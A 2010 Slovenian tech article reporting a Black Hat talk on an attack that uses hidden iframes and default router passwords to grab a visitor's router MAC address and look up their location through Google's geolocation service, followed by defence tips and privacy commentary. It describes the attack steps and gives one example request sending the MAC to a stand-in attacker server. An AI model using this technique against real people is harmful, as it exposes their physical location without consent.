Inovativen napad: Geolokacija, tudi brez vaše privolitve

N/A

8. avg 2010 ob 11:58:10

Dobro znani varnostni inženir Sammy Kamkar je na konferenci Black Hat predstavil zanimiv cross site scripting (XSS) napad, ki omogoča pridobitev zelo natančne fizične lokacije uporabnika. S spretno uporabo javascripta pridobi MAC naslov brezžičnega usmerjevalnika na strani uporabnika, nato pa preko Googleove geolokacijske storitve opravi poizvedbo za lokacijo tega MAC naslova. Google je v okviru programa Street View zbiral tudi podatke o prisotnih brezičnih omrežjih, s katerimi lahko precej natančno določi geografsko lokacijo brezžičnega usmerjevalnika.

Postopek, imenovan "How I met your girlfriend", in s humorističnim vzdevkom "XXXSS" (za cross-site scripting), je lepo razložen v video posnetku predavanja.

  1. Uporabnik obišče napadalčevo spletišče
  2. Na spletišču je skritih več iframe elementov, ki odpirajo naslove kot npr. http://192.168.1.1/moj_linksys_router ali http://192.168.200.1/imam_dlink - za vsako popularno dostopno točko po eden. Napadalec do teh naslovov ne more neposredno dostopati, ker se nahajajo na notranjem omrežju uporabnika, za uporabnikov brskalnik pa to seveda ni ovira.
  3. Na vsak iframe je dodan javascript onload handler, ki požene javscript kodo v primeru, da se kateri od teh naslovov dejansko naloži. Koda se nato z rabo privzetega gesla poskusi prijaviti v nadzorni vmesnik dostopne točke in potem ven izluščiti MAC naslov usmerjevalnika.
  4. Javascript koda naredi http zahtevek na naslov 
    http://streznik.od.napadal.ca/zabelezi_mac.cgi?mac=00:16:3e:18:44:44
    Tako dobi napadalec podatek o MAC naslovu uporabnikovega routerja.
  5. Napadalec kdaj drugič zaprosi za geolokacijo. Namesto pravega MAC naslova pa v zaglavje http zahtevka vstavi prej pridobljen uporabnikov MAC naslov, Google pa mu vrne tudi do 10 metrov natančno lokacijo.

Tovrstno početje je precej zanesljivo zlasti v ZDA, kjer so Googlovi avtomobili že natančno kartografirali ulice. Poleg kamer imajo nameščene še brezžične vmesnike, ki zavzetno in brez počitka beležijo najdena brezžična omrežja in njihovo moč. S premikom avtomobila moč narašča oz. pada, Googlova programska oprema pa lahko iz zbranih podatkov precej natančno določi lokacijo brezžičnega usmerjevalnika. Podatki se potem uporabljajo za geolokacijo zlasti mobilnih naprav in so bistveno bolj zanesljivi od same IP geolokacije. Mobilec je namreč bodisi na mobilnem bodisi na WiFi omrežju, in oba ponujata celice relativno majhne velikosti in s tem seveda zelo natančno geolokacijo. To pa zelo prav pride pri aplikacijah tipa augmented reality, kjer je ravno podatek o natančni lokaciji ključen.

Spomnimo, da je v EU Google prišel na oviro z nedavnim incidentom glede varovanja zasebnosti. Poleg problematičnega snemanja fotografij se je izkazalo, da naj bi Google v določenih primerih zbiral ne samo lokacijske podatke o WiFi usmerjevalnikov, ampak tudi vsebino prenosov po teh omrežjih, v kolikor niso bila šifrirana. Posledično je bilo na Google veliko pritiska s strani Evropske komisije in tudi vlad držav članic, kar je Google prisililo v odstranitev WiFi sprejemnikov (severna Evropa) in ponekod celo v suspenz ali prenehanje programa.

Nekaj nasvetov za obrambo pred tem napadom:

  1. Preprečite, da bi Googlovi avtomobilčki poknjižili vaš usmerjevalnik. Preden gredo mimo (v določenih evropskih državah morajo to vnaprej najaviti v lokalnem časopisju), je potrebno router preklopiti v "stealth mode", tj. način brez najavljanja svoje prisotnosti. Priklopijo se lahko le uporabniki, ki poznajo SSID, in če ta ni ravno linksys, bo vse vredu.
  2. Naslednja točka je preprečitev prijave z uporabo XSS napada. Sem sodi zamenjava privzetega nadzorniškega gesla z svojim, po možnosti dobrim. Alternativa je omejitev dostopa do nadzornega vmesnika zgolj preko žične povezave. Če dostop do vmesnika preko brezžičnega omrežja ni mogoč, ste s prenosnikom v dnevni sobi varni.
  3. Redno posodabljanje brskalnikov z varnostnimi popravki in po možnosti še kak vtičnik, ki blokira dostop do sumljivih spletnih strani (strani z ribarjenjem, XSS in drugimi napadi). Najnovejši Firefox in Chrome že vsebujeta vse potrebno.
  4. Vedno pa velja tudi zdrava presoja pri uporabi interneta.
V prihodnosti bo raba geolokacije zgolj večja, države pa na to gledajo izrazito dvolično. Po eni strani bijejo plat zvonov varovanja zasebnosti, po drugi strani pa si njihove policijske in obveščevalne službe močno želijo dostopa (v realnem času?) do teh podatkov, ali še huje, kar posredovanje teh podatkov določenim organizacijam v zasebnih sferah. Do obojega bo prihajalo, upajmo le, da pravna država ne zataji in da nošenje digitalnih pripomočkov ne postane obvezno oz. da ne-nošenje poleg načela "če nimate ničesar za skrivati, se nimate ničesar bati" ne postane tudi podlaga za sum.